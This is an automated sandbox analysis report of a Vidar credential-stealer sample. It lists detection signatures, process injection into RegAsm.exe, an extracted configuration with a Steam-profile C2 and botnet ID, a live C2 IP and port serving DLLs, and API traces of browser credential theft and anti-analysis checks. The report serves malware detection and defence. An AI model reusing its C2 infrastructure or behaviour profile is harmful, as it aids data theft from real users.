Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1443958
MD5:	7e74918f0790056546b862fa3e114c2a
SHA1:	0042d5e84604f4e144ea0795db36839c50d8ed1f
SHA256:	fed19121e9d547d9762e7aa6dd53e0756c414bd0a0650e38d6b0c01b000ad2fc
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Vidar stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6708 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7E74918F0790056546B862FA3E114C2A)

conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3264 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x221f0:$s1: JohnDoe 0x221e8:$s2: HAL9TH
00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6708	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6708	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 3264	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3264	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 3264	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3264	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x221f0:$s1: JohnDoe 0x221e8:$s2: HAL9TH
2.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x20df0:$s1: JohnDoe 0x20de8:$s2: HAL9TH
0.2.file.exe.130000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.130000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x46e30:$s1: JohnDoe 0x46e28:$s2: HAL9TH
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://116.202.5.235:9000/soft	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/softokn3.dllP	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/softokn3.dlldge	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/mozglue.dllEdge	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/nss3.dll2	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/softokn3.dllf	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/freebl3.dllEdge	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/vcruntime140.dllets	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/msvcp140.dlldge	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/sqlx.dll	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/softokn3.dll2	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/nss3.dllft	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/vcruntime140.dllUser	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/vcruntime140.dll.	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/v	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/f	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/b	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/vcruntime140.dllO	Avira URL Cloud: Label: malware
Source: https://t.me/k0mono	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199686524322/inventory/	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199686524322/badges	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/vcruntime140.dllh	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/msvcp140.dllD	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/vcruntime140.dllc	Avira URL Cloud: Label: malware
Source: https://116.202.5.235:9000/freebl3.dll	Avira URL Cloud: Label: malware
Source: https://116.202.5.235/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}

Multi AV Scanner detection for domain / URL

Source: https://116.202.5.235:9000/sqlx.dll	Virustotal: Detection: 9%			Perma Link
Source: https://116.202.5.235:9000/v	Virustotal: Detection: 9%			Perma Link

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014D9D0 FreeConsole,GetCurrentThreadId,CryptDecrypt,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,	0_2_0014D9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_004062A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00406242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004082DE memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	2_2_004082DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	2_2_0040245C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	2_2_00410DAC

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00145066 FindFirstFileExW,	0_2_00145066
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040C679
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_00401162
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_004162AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_004153F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_004094E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040A981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00415AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	2_2_00415E66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_00409F72

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

2_2_00415843

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199686524322

Source: global traffic

TCP traffic: 192.168.2.4:49744 -> 116.202.5.235:9000

Source: global traffic	HTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /k0mono HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 104.102.42.29 104.102.42.29
Source: Joe Sandbox View	IP Address: 116.202.5.235 116.202.5.235
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View

ASN Name: AKAMAI-ASUS AKAMAI-ASUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.5.235

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_0040514C

Source: global traffic	HTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /k0mono HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: t.me

Source: RegAsm.exe, 00000002.00000002.2900507814.0000000001272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 00000002.00000002.2900507814.000000000121A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabE
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235/ahI
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/2b1cosoft
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/8
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/9
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/B
Source: RegAsm.exe, 00000002.00000002.2900987028.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/N
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/O
Source: RegAsm.exe, 00000002.00000002.2900987028.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/V
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/b
Source: RegAsm.exe, 00000002.00000002.2900987028.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/f
Source: RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/freebl3.dll
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/freebl3.dllEdge
Source: RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/mozglue.dll
Source: RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/mozglue.dll$
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/mozglue.dllEdge
Source: RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2900806294.0000000001380000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/msvcp140.dll
Source: RegAsm.exe, 00000002.00000002.2900806294.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/msvcp140.dllD
Source: RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/msvcp140.dllP
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/msvcp140.dlldge
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/nss3.dll
Source: RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/nss3.dll2
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/nss3.dllft
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/soft
Source: RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/softokn3.dll
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/softokn3.dll2
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/softokn3.dllP
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/softokn3.dlldge
Source: RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/softokn3.dllf
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/sqlx.dll
